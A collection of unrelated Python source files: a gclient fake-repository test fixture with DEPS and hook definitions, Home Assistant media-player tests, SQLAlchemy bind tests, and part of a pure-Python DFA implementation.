sock.close()
def populateGit(self):
raise NotImplementedError()
class FakeRepos(FakeReposBase):
"""Implements populateGit()."""
NB_GIT_REPOS = 14
def populateGit(self):
# Testing:
# - dependency disappear
# - dependency renamed
# - versioned and unversioned reference
# - relative and full reference
# - deps_os
# - var
# - hooks
# TODO(maruel):
# - use_relative_paths
self._commit_git('repo_3', {
'origin': 'git/repo_3@1\n',
})
self._commit_git('repo_3', {
'origin': 'git/repo_3@2\n',
})
self._commit_git('repo_1', {
'DEPS': """
vars = {
'DummyVariable': 'repo',
'false_var': False,
'false_str_var': 'False',
'true_var': True,
'true_str_var': 'True',
'str_var': 'abc',
'cond_var': 'false_str_var and true_var',
}
# Nest the args file in a sub-repo, to make sure we don't try to
# write it before we've cloned everything.
gclient_gn_args_file = 'src/repo2/gclient.args'
gclient_gn_args = [
'false_var',
'false_str_var',
'true_var',
'true_str_var',
'str_var',
'cond_var',
]
deps = {
'src/repo2': {
'url': '%(git_base)srepo_2',
'condition': 'True',
},
'src/repo2/repo3': '/' + Var('DummyVariable') + '_3@%(hash3)s',
# Test that deps where condition evaluates to False are skipped.
'src/repo5': {
'url': '/repo_5',
'condition': 'False',
},
}
deps_os = {
'mac': {
'src/repo4': '/repo_4',
},
}""" % {
'git_base': self.git_base,
# See self.__init__() for the format. Grabs the hash of the first
# commit in repo_3. Only keep the first 7 characters because of:
# TODO(maruel): http://crosbug.com/3591 We need to strip the hash..
# duh.
'hash3': self.git_hashes['repo_3'][1][0][:7]
},
'origin': 'git/repo_1@1\n',
})
self._commit_git('repo_2', {
'origin': 'git/repo_2@1\n',
'DEPS': """
deps = {
'foo/bar': '/repo_3',
}
""",
})
self._commit_git('repo_2', {
'origin': 'git/repo_2@2\n',
})
self._commit_git('repo_4', {
'origin': 'git/repo_4@1\n',
})
self._commit_git('repo_4', {
'origin': 'git/repo_4@2\n',
})
self._commit_git('repo_1', {
'DEPS': """
deps = {
'src/repo2': '%(git_base)srepo_2@%(hash)s',
'src/repo2/repo_renamed': '/repo_3',
}
# I think this is wrong to have the hooks run from the base of the gclient
# checkout. It's maybe a bit too late to change that behavior.
hooks = [
{
'pattern': '.',
'action': ['python', '-c',
'open(\\'src/git_hooked1\\', \\'w\\').write(\\'git_hooked1\\')'],
},
{
# Should not be run.
'pattern': 'nonexistent',
'action': ['python', '-c',
'open(\\'src/git_hooked2\\', \\'w\\').write(\\'git_hooked2\\')'],
},
]
""" % {
'git_base': self.git_base,
# See self.__init__() for the format. Grabs the hash of the first
# commit in repo_2. Only keep the first 7 characters because of:
# TODO(maruel): http://crosbug.com/3591 We need to strip the hash.. duh.
'hash': self.git_hashes['repo_2'][1][0][:7]
},
'origin': 'git/repo_1@2\n',
})
self._commit_git('repo_5', {'origin': 'git/repo_5@1\n'})
self._commit_git('repo_5', {
'DEPS': """
deps = {
'src/repo1': '%(git_base)srepo_1@%(hash1)s',
'src/repo2': '%(git_base)srepo_2@%(hash2)s',
}
# Hooks to run after a project is processed but before its dependencies are
# processed.
pre_deps_hooks = [
{
'action': ['python', '-c',
'print "pre-deps hook"; open(\\'src/git_pre_deps_hooked\\', \\'w\\').write(\\'git_pre_deps_hooked\\')'],
}
]
""" % {
'git_base': self.git_base,
'hash1': self.git_hashes['repo_1'][2][0][:7],
'hash2': self.git_hashes['repo_2'][1][0][:7],
},
'origin': 'git/repo_5@2\n',
})
self._commit_git('repo_5', {
'DEPS': """
deps = {
'src/repo1': '%(git_base)srepo_1@%(hash1)s',
'src/repo2': '%(git_base)srepo_2@%(hash2)s',
}
# Hooks to run after a project is processed but before its dependencies are
# processed.
pre_deps_hooks = [
{
'action': ['python', '-c',
'print "pre-deps hook"; open(\\'src/git_pre_deps_hooked\\', \\'w\\').write(\\'git_pre_deps_hooked\\')'],
},
{
'action': ['python', '-c', 'import sys; sys.exit(1)'],
}
]
""" % {
'git_base': self.git_base,
'hash1': self.git_hashes['repo_1'][2][0][:7],
'hash2': self.git_hashes['repo_2'][1][0][:7],
},
'origin': 'git/repo_5@3\n',
})
self._commit_git('repo_6', {
'DEPS': """
vars = {
'DummyVariable': 'repo',
'git_base': '%(git_base)s',
'hook1_contents': 'git_hooked1',
'repo5_var': '/repo_5',
'false_var': False,
'false_str_var': 'False',
'true_var': True,
'true_str_var': 'True',
'str_var': 'abc',
'cond_var': 'false_str_var and true_var',
}
gclient_gn_args_file = 'src/repo2/gclient.args'
gclient_gn_args = [
'false_var',
'false_str_var',
'true_var',
'true_str_var',
'str_var',
'cond_var',
]
allowed_hosts = [
'%(git_base)s',
]
deps = {
'src/repo2': {
'url': Var('git_base') + 'repo_2@%(hash)s',
'condition': 'true_str_var',
},
'src/repo4': {
'url': '/repo_4',
'condition': 'False',
},
'src/repo8': '/repo_8',
}
deps_os ={
'mac': {
# This entry should not appear in flattened DEPS' |deps|.
'src/mac_repo': '{repo5_var}',
},
'unix': {
# This entry should not appear in flattened DEPS' |deps|.
'src/unix_repo': '{repo5_var}',
},
'win': {
# This entry should not appear in flattened DEPS' |deps|.
'src/win_repo': '{repo5_var}',
},
}
hooks = [
{
'pattern': '.',
'condition': 'True',
'action': ['python', '-c',
'open(\\'src/git_hooked1\\', \\'w\\').write(\\'{hook1_contents}\\')'],
},
{
# Should not be run.
'pattern': 'nonexistent',
'action': ['python', '-c',
'open(\\'src/git_hooked2\\', \\'w\\').write(\\'git_hooked2\\')'],
},
]
hooks_os = {
'mac': [
{
'pattern': '.',
'action': ['python', '-c',
'open(\\'src/git_hooked_mac\\', \\'w\\').write('
'\\'git_hooked_mac\\')'],
},
],
}
recursedeps = [
'src/repo2',
'src/repo8',
]""" % {
'git_base': self.git_base,
'hash': self.git_hashes['repo_2'][1][0][:7]
},
'origin': 'git/repo_6@1\n',
})
self._commit_git('repo_7', {
'DEPS': """
vars = {
'true_var': 'True',
'false_var': 'true_var and False',
}
hooks = [
{
'action': ['python', '-c',
'open(\\'src/should_run\\', \\'w\\').write(\\'should_run\\')'],
'condition': 'true_var or True',
},
{
'action': ['python', '-c',
'open(\\'src/should_not_run\\', \\'w\\').write(\\'should_not_run\\')'],
'condition': 'false_var',
},
]""",
'origin': 'git/repo_7@1\n',
})
self._commit_git('repo_8', {
'DEPS': """
deps_os ={
'mac': {
'src/recursed_os_repo': '/repo_5',
},
'unix': {
'src/recursed_os_repo': '/repo_5',
},
}""",
'origin': 'git/repo_8@1\n',
})
self._commit_git('repo_9', {
'DEPS': """
deps = {
'src/repo8': '/repo_8',
# This entry should appear in flattened file,
# but not recursed into, since it's not
# in recursedeps.
'src/repo7': '/repo_7',
}
deps_os = {
'android': {
# This entry should only appear in flattened |deps_os|,
# not |deps|, even when used with |recursedeps|.
'src/repo4': '/repo_4',
}
}
recursedeps = [
'src/repo4',
'src/repo8',
]""",
'origin': 'git/repo_9@1\n',
})
self._commit_git('repo_10', {
'DEPS': """
deps = {
'src/repo9': '/repo_9',
# This entry should appear in flattened file,
# but not recursed into, since it's not
# in recursedeps.
'src/repo6': '/repo_6',
}
deps_os = {
'mac': {
'src/repo11': '/repo_11',
},
'ios': {
'src/repo11': '/repo_11',
}
}
recursedeps = [
'src/repo9',
'src/repo11',
]""",
'origin': 'git/repo_10@1\n',
})
self._commit_git('repo_11', {
'DEPS': """
deps = {
'src/repo12': '/repo_12',
}""",
'origin': 'git/repo_11@1\n',
})
self._commit_git('repo_12', {
'origin': 'git/repo_12@1\n',
})
self._fast_import_git('repo_12', """blob
mark :1
data 6
Hello
blob
mark :2
data 4
Bye
reset refs/changes/1212
commit refs/changes/1212
mark :3
author Bob <bob@example.com> 1253744361 -0700
committer Bob <bob@example.com> 1253744361 -0700
data 8
A and B
M 100644 :1 a
M 100644 :2 b
""")
self._commit_git('repo_13', {
'DEPS': """
deps = {
'src/repo12': '/repo_12',
}""",
'origin': 'git/repo_13@1\n',
})
self._commit_git('repo_13', {
'DEPS': """
deps = {
'src/repo12': '/repo_12@refs/changes/1212',
}""",
'origin': 'git/repo_13@2\n',
})
self._commit_git('repo_14', {
'DEPS': textwrap.dedent("""\
deps = {
'src/cipd_dep': {
'packages': [
{
'package': 'package0',
'version': '0.1',
},
],
'dep_type': 'cipd',
},
}"""),
'origin': 'git/repo_14@2\n'
})
class FakeRepoSkiaDEPS(FakeReposBase):
"""Simulates the Skia DEPS transition in Chrome."""
NB_GIT_REPOS = 5
DEPS_git_pre = """deps = {
'src/third_party/skia/gyp': '%(git_base)srepo_3',
'src/third_party/skia/include': '%(git_base)srepo_4',
'src/third_party/skia/src': '%(git_base)srepo_5',
}"""
DEPS_post = """deps = {
'src/third_party/skia': '%(git_base)srepo_1',
}"""
def populateGit(self):
# Skia repo.
self._commit_git('repo_1', {
'skia_base_file': 'root-level file.',
'gyp/gyp_file': 'file in the gyp directory',
'include/include_file': 'file in the include directory',
'src/src_file': 'file in the src directory',
})
self._commit_git('repo_3', { # skia/gyp
'gyp_file': 'file in the gyp directory',
})
self._commit_git('repo_4', { # skia/include
'include_file': 'file in the include directory',
})
self._commit_git('repo_5', { # skia/src
'src_file': 'file in the src directory',
})
# Chrome repo.
self._commit_git('repo_2', {
'DEPS': self.DEPS_git_pre % {'git_base': self.git_base},
'myfile': 'src/trunk/src@1'
})
self._commit_git('repo_2', {
'DEPS': self.DEPS_post % {'git_base': self.git_base},
'myfile': 'src/trunk/src@2'
})
class FakeRepoBlinkDEPS(FakeReposBase):
"""Simulates the Blink DEPS transition in Chrome."""
NB_GIT_REPOS = 2
DEPS_pre = 'deps = {"src/third_party/WebKit": "%(git_base)srepo_2",}'
DEPS_post = 'deps = {}'
def populateGit(self):
# Blink repo.
self._commit_git('repo_2', {
'OWNERS': 'OWNERS-pre',
'Source/exists_always': '_ignored_',
'Source/exists_before_but_not_after': '_ignored_',
})
# Chrome repo.
self._commit_git('repo_1', {
'DEPS': self.DEPS_pre % {'git_base': self.git_base},
'myfile': 'myfile@1',
'.gitignore': '/third_party/WebKit',
})
self._commit_git('repo_1', {
'DEPS': self.DEPS_post % {'git_base': self.git_base},
'myfile': 'myfile@2',
'.gitignore': '',
'third_party/WebKit/OWNERS': 'OWNERS-post',
'third_party/WebKit/Source/exists_always': '_ignored_',
'third_party/WebKit/Source/exists_after_but_not_before': '_ignored',
})
def populateSvn(self):
raise NotImplementedError()
class FakeReposTestBase(trial_dir.TestCase):
"""This is vaguely inspired by twisted."""
# Static FakeRepos instances. Lazy loaded.
CACHED_FAKE_REPOS = {}
# Override if necessary.
FAKE_REPOS_CLASS = FakeRepos
def setUp(self):
super(FakeReposTestBase, self).setUp()
if not self.FAKE_REPOS_CLASS in self.CACHED_FAKE_REPOS:
self.CACHED_FAKE_REPOS[self.FAKE_REPOS_CLASS] = self.FAKE_REPOS_CLASS()
self.FAKE_REPOS = self.CACHED_FAKE_REPOS[self.FAKE_REPOS_CLASS]
# No need to call self.FAKE_REPOS.setUp(), it will be called by the child
# class.
# Do not define tearDown(), since super's version does the right thing and
# self.FAKE_REPOS is kept across tests.
@property
def git_base(self):
"""Shortcut."""
return self.FAKE_REPOS.git_base
def checkString(self, expected, result, msg=None):
"""Prints the diffs to ease debugging."""
if expected != result:
# Strip the beginning
while expected and result and expected[0] == result[0]:
expected = expected[1:]
result = result[1:]
# The exception trace makes it hard to read so dump it too.
if '\n' in result:
print result
self.assertEquals(expected, result, msg)
def check(self, expected, results):
"""Checks stdout, stderr, returncode."""
self.checkString(expected[0], results[0])
self.checkString(expected[1], results[1])
self.assertEquals(expected[2], results[2])
def assertTree(self, tree, tree_root=None):
"""Diff the checkout tree with a dict."""
if not tree_root:
tree_root = self.root_dir
actual = read_tree(tree_root)
diff = dict_diff(tree, actual)
if diff:
logging.debug('Actual %s\n%s' % (tree_root, pprint.pformat(actual)))
logging.debug('Expected\n%s' % pprint.pformat(tree))
logging.debug('Diff\n%s' % pprint.pformat(diff))
self.assertEquals(diff, {})
def mangle_git_tree(self, *args):
"""Creates a 'virtual directory snapshot' to compare with the actual result
on disk."""
result = {}
for item, new_root in args:
repo, rev = item.split('@', 1)
tree = self.gittree(repo, rev)
for k, v in tree.iteritems():
result[join(new_root, k)] = v
return result
def githash(self, repo, rev):
"""Sort-hand: Returns the hash for a git 'revision'."""
return self.FAKE_REPOS.git_hashes[repo][int(rev)][0]
def gittree(self, repo, rev):
"""Sort-hand: returns the directory tree for a git 'revision'."""
return self.FAKE_REPOS.git_hashes[repo][int(rev)][1]
def gitrevparse(self, repo):
"""Returns the actual revision for a given repo."""
return self.FAKE_REPOS._git_rev_parse(repo)
def main(argv):
fake = FakeRepos()
print 'Using %s' % fake.root_dir
try:
fake.set_up_git()
print('Fake setup, press enter to quit or Ctrl-C to keep the checkouts.')
sys.stdin.readline()
except KeyboardInterrupt:
trial_dir.TrialDir.SHOULD_LEAK.leak = True
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))
|
|
"""Test the base functions of the media player."""
import asyncio
import base64
from http import HTTPStatus
from unittest.mock import patch
from homeassistant.components import media_player
from homeassistant.components.media_player.browse_media import BrowseMedia
from homeassistant.components.websocket_api.const import TYPE_RESULT
from homeassistant.const import ATTR_ENTITY_ID, STATE_OFF
from homeassistant.setup import async_setup_component
async def test_get_image(hass, hass_ws_client, caplog):
"""Test get image via WS command."""
await async_setup_component(
hass, "media_player", {"media_player": {"platform": "demo"}}
)
await hass.async_block_till_done()
client = await hass_ws_client(hass)
with patch(
"homeassistant.components.media_player.MediaPlayerEntity."
"async_get_media_image",
return_value=(b"image", "image/jpeg"),
):
await client.send_json(
{
"id": 5,
"type": "media_player_thumbnail",
"entity_id": "media_player.bedroom",
}
)
msg = await client.receive_json()
assert msg["id"] == 5
assert msg["type"] == TYPE_RESULT
assert msg["success"]
assert msg["result"]["content_type"] == "image/jpeg"
assert msg["result"]["content"] == base64.b64encode(b"image").decode("utf-8")
assert "media_player_thumbnail is deprecated" in caplog.text
async def test_get_image_http(hass, hass_client_no_auth):
"""Test get image via http command."""
await async_setup_component(
hass, "media_player", {"media_player": {"platform": "demo"}}
)
await hass.async_block_till_done()
state = hass.states.get("media_player.bedroom")
assert "entity_picture_local" not in state.attributes
client = await hass_client_no_auth()
with patch(
"homeassistant.components.media_player.MediaPlayerEntity."
"async_get_media_image",
return_value=(b"image", "image/jpeg"),
):
resp = await client.get(state.attributes["entity_picture"])
content = await resp.read()
assert content == b"image"
async def test_get_image_http_remote(hass, hass_client_no_auth):
"""Test get image url via http command."""
with patch(
"homeassistant.components.media_player.MediaPlayerEntity."
"media_image_remotely_accessible",
return_value=True,
):
await async_setup_component(
hass, "media_player", {"media_player": {"platform": "demo"}}
)
await hass.async_block_till_done()
state = hass.states.get("media_player.bedroom")
assert "entity_picture_local" in state.attributes
client = await hass_client_no_auth()
with patch(
"homeassistant.components.media_player.MediaPlayerEntity."
"async_get_media_image",
return_value=(b"image", "image/jpeg"),
):
resp = await client.get(state.attributes["entity_picture_local"])
content = await resp.read()
assert content == b"image"
async def test_get_image_http_log_credentials_redacted(
hass, hass_client_no_auth, aioclient_mock, caplog
):
"""Test credentials are redacted when logging url when fetching image."""
url = "http://vi:pass@example.com/default.jpg"
with patch(
"homeassistant.components.demo.media_player.DemoYoutubePlayer.media_image_url",
url,
):
await async_setup_component(
hass, "media_player", {"media_player": {"platform": "demo"}}
)
await hass.async_block_till_done()
state = hass.states.get("media_player.bedroom")
assert "entity_picture_local" not in state.attributes
aioclient_mock.get(url, exc=asyncio.TimeoutError())
client = await hass_client_no_auth()
resp = await client.get(state.attributes["entity_picture"])
assert resp.status == HTTPStatus.INTERNAL_SERVER_ERROR
assert f"Error retrieving proxied image from {url}" not in caplog.text
assert (
"Error retrieving proxied image from "
f"{url.replace('pass', 'xxxxxxxx').replace('vi', 'xxxx')}"
) in caplog.text
async def test_get_async_get_browse_image(hass, hass_client_no_auth, hass_ws_client):
"""Test get browse image."""
await async_setup_component(
hass, "media_player", {"media_player": {"platform": "demo"}}
)
await hass.async_block_till_done()
entity_comp = hass.data.get("entity_components", {}).get("media_player")
assert entity_comp
player = entity_comp.get_entity("media_player.bedroom")
assert player
client = await hass_client_no_auth()
with patch(
"homeassistant.components.media_player.MediaPlayerEntity."
"async_get_browse_image",
return_value=(b"image", "image/jpeg"),
):
url = player.get_browse_image_url("album", "abcd")
resp = await client.get(url)
content = await resp.read()
assert content == b"image"
async def test_media_browse(hass, hass_ws_client):
"""Test browsing media."""
await async_setup_component(
hass, "media_player", {"media_player": {"platform": "demo"}}
)
await hass.async_block_till_done()
client = await hass_ws_client(hass)
with patch(
"homeassistant.components.demo.media_player.YOUTUBE_PLAYER_SUPPORT",
media_player.SUPPORT_BROWSE_MEDIA,
), patch(
"homeassistant.components.media_player.MediaPlayerEntity.async_browse_media",
return_value=BrowseMedia(
media_class=media_player.MEDIA_CLASS_DIRECTORY,
media_content_id="mock-id",
media_content_type="mock-type",
title="Mock Title",
can_play=False,
can_expand=True,
),
) as mock_browse_media:
await client.send_json(
{
"id": 5,
"type": "media_player/browse_media",
"entity_id": "media_player.bedroom",
"media_content_type": "album",
"media_content_id": "abcd",
}
)
msg = await client.receive_json()
assert msg["id"] == 5
assert msg["type"] == TYPE_RESULT
assert msg["success"]
assert msg["result"] == {
"title": "Mock Title",
"media_class": "directory",
"media_content_type": "mock-type",
"media_content_id": "mock-id",
"can_play": False,
"can_expand": True,
"children_media_class": None,
"thumbnail": None,
"not_shown": 0,
"children": [],
}
assert mock_browse_media.mock_calls[0][1] == ("album", "abcd")
with patch(
"homeassistant.components.demo.media_player.YOUTUBE_PLAYER_SUPPORT",
media_player.SUPPORT_BROWSE_MEDIA,
), patch(
"homeassistant.components.media_player.MediaPlayerEntity.async_browse_media",
return_value={"bla": "yo"},
):
await client.send_json(
{
"id": 6,
"type": "media_player/browse_media",
"entity_id": "media_player.bedroom",
}
)
msg = await client.receive_json()
assert msg["id"] == 6
assert msg["type"] == TYPE_RESULT
assert msg["success"]
assert msg["result"] == {"bla": "yo"}
async def test_group_members_available_when_off(hass):
"""Test that group_members are still available when media_player is off."""
await async_setup_component(
hass, "media_player", {"media_player": {"platform": "demo"}}
)
await hass.async_block_till_done()
# Fake group support for DemoYoutubePlayer
with patch(
"homeassistant.components.demo.media_player.YOUTUBE_PLAYER_SUPPORT",
media_player.SUPPORT_GROUPING | media_player.SUPPORT_TURN_OFF,
):
await hass.services.async_call(
"media_player",
"turn_off",
{ATTR_ENTITY_ID: "media_player.bedroom"},
blocking=True,
)
state = hass.states.get("media_player.bedroom")
assert state.state == STATE_OFF
assert "group_members" in state.attributes
|
|
"""tests the "bind" attribute/argument across schema and SQL,
including the deprecated versions of these arguments"""
from sqlalchemy.test.testing import eq_
from sqlalchemy import engine, exc
from sqlalchemy import MetaData, ThreadLocalMetaData
from sqlalchemy import Integer, text
from sqlalchemy.test.schema import Table
from sqlalchemy.test.schema import Column
import sqlalchemy as sa
from sqlalchemy.test import testing
class BindTest(testing.TestBase):
def test_create_drop_explicit(self):
metadata = MetaData()
table = Table('test_table', metadata,
Column('foo', Integer))
for bind in (
testing.db,
testing.db.connect()
):
for args in [
([], {'bind':bind}),
([bind], {})
]:
metadata.create_all(*args[0], **args[1])
assert table.exists(*args[0], **args[1])
metadata.drop_all(*args[0], **args[1])
table.create(*args[0], **args[1])
table.drop(*args[0], **args[1])
assert not table.exists(*args[0], **args[1])
def test_create_drop_err(self):
metadata = MetaData()
table = Table('test_table', metadata,
Column('foo', Integer))
for meth in [
metadata.create_all,
metadata.drop_all,
table.create,
table.drop,
]:
try:
meth()
assert False
except exc.UnboundExecutionError, e:
eq_(
str(e),
"The MetaData "
"is not bound to an Engine or Connection. "
"Execution can not proceed without a database to execute "
"against. Either execute with an explicit connection or "
"assign the MetaData's .bind to enable implicit execution.")
for meth in [
table.exists,
# future:
#table.create,
#table.drop,
]:
try:
meth()
assert False
except exc.UnboundExecutionError, e:
eq_(
str(e),
"The Table 'test_table' "
"is not bound to an Engine or Connection. "
"Execution can not proceed without a database to execute "
"against. Either execute with an explicit connection or "
"assign this Table's .metadata.bind to enable implicit "
"execution.")
@testing.future
def test_create_drop_err2(self):
metadata = MetaData()
table = Table('test_table', metadata,
Column('foo', Integer))
for meth in [
table.exists,
table.create,
table.drop,
]:
try:
meth()
assert False
except exc.UnboundExecutionError, e:
eq_(
str(e),
"The Table 'test_table' "
"is not bound to an Engine or Connection. "
"Execution can not proceed without a database to execute "
"against. Either execute with an explicit connection or "
"assign this Table's .metadata.bind to enable implicit "
"execution.")
@testing.uses_deprecated()
def test_create_drop_bound(self):
for meta in (MetaData,ThreadLocalMetaData):
for bind in (
testing.db,
testing.db.connect()
):
metadata = meta()
table = Table('test_table', metadata,
Column('foo', Integer))
metadata.bind = bind
assert metadata.bind is table.bind is bind
metadata.create_all()
assert table.exists()
metadata.drop_all()
table.create()
table.drop()
assert not table.exists()
metadata = meta()
table = Table('test_table', metadata,
Column('foo', Integer))
metadata.bind = bind
assert metadata.bind is table.bind is bind
metadata.create_all()
assert table.exists()
metadata.drop_all()
table.create()
table.drop()
assert not table.exists()
if isinstance(bind, engine.Connection):
bind.close()
def test_create_drop_constructor_bound(self):
for bind in (
testing.db,
testing.db.connect()
):
try:
for args in (
([bind], {}),
([], {'bind':bind}),
):
metadata = MetaData(*args[0], **args[1])
table = Table('test_table', metadata,
Column('foo', Integer))
assert metadata.bind is table.bind is bind
metadata.create_all()
assert table.exists()
metadata.drop_all()
table.create()
table.drop()
assert not table.exists()
finally:
if isinstance(bind, engine.Connection):
bind.close()
def test_implicit_execution(self):
metadata = MetaData()
table = Table('test_table', metadata,
Column('foo', Integer),
test_needs_acid=True,
)
conn = testing.db.connect()
metadata.create_all(bind=conn)
try:
trans = conn.begin()
metadata.bind = conn
t = table.insert()
assert t.bind is conn
table.insert().execute(foo=5)
table.insert().execute(foo=6)
table.insert().execute(foo=7)
trans.rollback()
metadata.bind = None
assert conn.execute("select count(1) from test_table").scalar() == 0
finally:
metadata.drop_all(bind=conn)
def test_clauseelement(self):
metadata = MetaData()
table = Table('test_table', metadata,
Column('foo', Integer))
metadata.create_all(bind=testing.db)
try:
for elem in [
table.select,
lambda **kwargs: sa.func.current_timestamp(**kwargs).select(),
# func.current_timestamp().select,
lambda **kwargs:text("select * from test_table", **kwargs)
]:
for bind in (
testing.db,
testing.db.connect()
):
try:
e = elem(bind=bind)
assert e.bind is bind
e.execute().close()
finally:
if isinstance(bind, engine.Connection):
bind.close()
try:
e = elem()
assert e.bind is None
e.execute()
assert False
except exc.UnboundExecutionError, e:
assert str(e).endswith(
'is not bound and does not support direct '
'execution. Supply this statement to a Connection or '
'Engine for execution. Or, assign a bind to the '
'statement or the Metadata of its underlying tables to '
'enable implicit execution via this method.')
finally:
if isinstance(bind, engine.Connection):
bind.close()
metadata.drop_all(bind=testing.db)
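# A minimal sketch (not itself a test) of the two binding styles exercised above,
# assuming a working `testing.db` engine:
#
#     metadata = MetaData()
#     table = Table('t', metadata, Column('foo', Integer))
#     metadata.create_all(bind=testing.db)   # explicit bind on the DDL call
#     metadata.bind = testing.db             # or: enable implicit execution
#     table.insert().execute(foo=1)          # statement picks up metadata.bind
#     metadata.drop_all(bind=testing.db)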
|
|
"""
This module performs all basic DFA operations, without pyfst
"""
#!/usr/bin/python
from operator import attrgetter
from itertools import product
import copy
from alphabet import createalphabet
from collections import defaultdict
EPSILON = 0xffff
def TropicalWeight(param):
"""
Returns the emulated fst TropicalWeight
Args:
        param: The input weight value
    Returns:
        bool: False if the weight is infinite, True otherwise
"""
if param == (float('inf')):
return False
else:
return True
class DFAState:
"""The DFA statess"""
def __init__(self, sid=None):
"""
Initialization function
Args:
sid (int): The state identifier
Returns:
None
"""
self.final = False
self.initial = False
self.stateid = sid
self.arcs = []
def __iter__(self):
"""Iterator"""
return iter(self.arcs)
class DFAArc:
"""The DFA transition"""
def __init__(self, srcstate_id, nextstate_id, ilabel=None):
"""
The initialization function
Args:
srcstate_id (int): The source state identifier
nextstate_id (int): The destination state identifier
            ilabel (int): The symbol identifier corresponding to the transition character
"""
self.srcstate = srcstate_id
self.nextstate = nextstate_id
self.ilabel = ilabel
class syms:
"""The DFA accepted symbols"""
def __init__(self):
"""Initialize symbols"""
self.symbols = {}
self.reversesymbols = {}
def __getitem__(self, char):
"""
Finds a symbol identifier based on the input character
Args:
char (str): The symbol character
Returns:
int: The retrieved symbol identifier
"""
return self.reversesymbols[char]
def __setitem__(self, char, num):
"""
Sets a symbol
Args:
char (str): The symbol character
num (int): The symbol identifier
Returns:
None
"""
self.symbols[num] = char
self.reversesymbols[char] = num
def find(self, num):
"""
Finds a symbol based on its identifier
Args:
num (int): The symbol identifier
Returns:
str: The retrieved symbol
"""
return self.symbols[num]
def items(self):
"""Returns all stored symbols
Args:
None
Returns:
            dict: The included symbols
"""
return self.symbols
class PythonDFA(object):
"""A DFA implementation that uses the
same interface with python symautomata"""
def __init__(self, alphabet=createalphabet()):
"""
Args:
            alphabet (list): The input alphabet
Returns:
None
"""
self.states = []
self.alphabet = alphabet
self.nfa = False
num = 1
self.isyms = syms()
self.osyms = syms()
for char in alphabet + [EPSILON]:
self.isyms.__setitem__(char, num)
self.osyms.__setitem__(char, num)
num = num + 1
def __str__(self):
"""Describes DFA object"""
return "This is a python DFA object with " + `len(self.states)` + " states"
def __getitem__(self, state):
"""
Retrieves a state
Args:
state (int): State identifier
Returns:
DFA state: The selected dfa state
"""
return self.states[state]
def __setitem__(self, state, newstate=None):
"""
Sets a new state
Args:
state (int): State identifier
newstate (DFA State): The selected dfa state
Returns:
None
"""
self.states[state] = newstate
def define(self):
"""If DFA is empty, create a sink state"""
if len(self.states) == 0:
for char in self.alphabet:
self.add_arc(0, 0, char)
self[0].final = False
def add_state(self):
"""Adds a new state"""
sid = len(self.states)
self.states.append(DFAState(sid))
return sid
def add_arc(self, src, dst, char):
"""Adds a new Arc
Args:
src (int): The source state identifier
dst (int): The destination state identifier
char (str): The character for the transition
Returns:
None
"""
# assert type(src) == type(int()) and type(dst) == type(int()), \
# "State type should be integer."
# assert char in self.I
#
#print self.states
#print src
for s_idx in [src, dst]:
if s_idx >= len(self.states):
for i in range(len(self.states), s_idx + 1):
self.states.append(DFAState(i))
for arc in self.states[src].arcs:
if arc.ilabel == self.isyms.__getitem__(char) or char == EPSILON:
self.nfa = True
break
self.states[src].arcs.append(
DFAArc(src, dst, self.isyms.__getitem__(char)))
def fixminimized(self, alphabet):
"""
After pyfst minimization,
all unused arcs are removed,
and all sink states are removed.
However this may break compatibility.
Args:
alphabet (list): The input alphabet
Returns:
None
"""
return
# endstate = self.add_state()
# for state in self.states:
# for char in alphabet:
# found = 0
# for arc in state.arcs:
# if self.isyms.find(arc.ilabel) == char:
# found = 1
# break
# if found == 0:
# self.add_arc(state.stateid, endstate, char)
#
# self[endstate].final = False
#
# for char in alphabet:
# self.add_arc(endstate, endstate, char)
def _addsink(self, alphabet):
"""
Adds a sink state
Args:
alphabet (list): The input alphabet
Returns:
None
"""
endstate = len(list(self.states))
for state in self.states:
for char in alphabet:
found = 0
for arc in state.arcs:
if self.isyms.find(arc.ilabel) == char:
found = 1
break
if found == 0:
self.add_arc(state.stateid, endstate, char)
self[endstate].final = False
for char in alphabet:
self.add_arc(endstate, endstate, char)
def consume_input(self, inp):
"""
        Return True if the machine accepts the input, False otherwise.
        Args:
            inp (str): input string to be consumed
        Returns:
            bool: True if the DFA accepts the provided input,
            False otherwise
"""
cur_state = sorted(
self.states,
key=attrgetter('initial'),
reverse=True)[0]
while len(inp) > 0:
found = False
for arc in cur_state.arcs:
if self.isyms.find(arc.ilabel) == inp[0]:
cur_state = self[arc.nextstate]
inp = inp[1:]
found = True
break
if not found:
return False
return cur_state.final
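    # Example (hedged): for a machine whose initial state 0 has an arc
    # 0 -'a'-> 1 with state 1 final, consume_input('a') follows the single
    # matching arc and returns True, while consume_input('b') finds no
    # matching arc and returns False.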
def empty(self):
"""
Return True if the DFA accepts the empty language.
"""
# self.minimize()
return len(list(self.states)) == 0
def complement(self, alphabet):
"""
Returns the complement of DFA
Args:
alphabet (list): The input alphabet
Returns:
None
"""
states = sorted(self.states, key=attrgetter('initial'), reverse=True)
for state in states:
if state.final:
state.final = False
else:
state.final = True
def init_from_acceptor(self, acceptor):
"""
Adds a sink state
Args:
alphabet (list): The input alphabet
Returns:
None
"""
self.states = copy.deepcopy(acceptor.states)
self.alphabet = copy.deepcopy(acceptor.alphabet)
self.osyms = copy.deepcopy(acceptor.osyms)
self.isyms = copy.deepcopy(acceptor.isyms)
def save(self, txt_fst_file_name):
"""
Save the machine in the openFST format in the file denoted by
txt_fst_file_name.
Args:
txt_fst_file_name (str): The output file
Returns:
None
"""
output_filename = open(txt_fst_file_name, 'w+')
states = sorted(self.states, key=attrgetter('initial'), reverse=True)
for state in states:
for arc in state.arcs:
itext = self.isyms.find(arc.ilabel)
otext = self.osyms.find(arc.ilabel)
output_filename.write(
'{}\t{}\t{}\t{}\n'.format(
state.stateid,
arc.nextstate,
itext.encode('hex'),
otext.encode('hex')))
if state.final:
output_filename.write('{}\n'.format(state.stateid))
output_filename.close()
def load(self, txt_fst_file_name):
"""
        Load the transducer from the text file format of OpenFST.
The format is specified as follows:
arc format: src dest ilabel olabel [weight]
final state format: state [weight]
lines may occur in any order except initial state must be first line
Args:
txt_fst_file_name (str): The input file
Returns:
None
"""
with open(txt_fst_file_name, 'r') as input_filename:
for line in input_filename:
line = line.strip()
split_line = line.split()
if len(split_line) == 1:
self[int(split_line[0])].final = True
else:
self.add_arc(int(split_line[0]), int(split_line[1]),
split_line[2].decode('hex'))
def minimize(self):
"""Minimizes the DFA using Hopcroft algorithm"""
self.hopcroft()
def intersect(self, other):
"""Constructs an unminimized DFA recognizing
the intersection of the languages of two given DFAs.
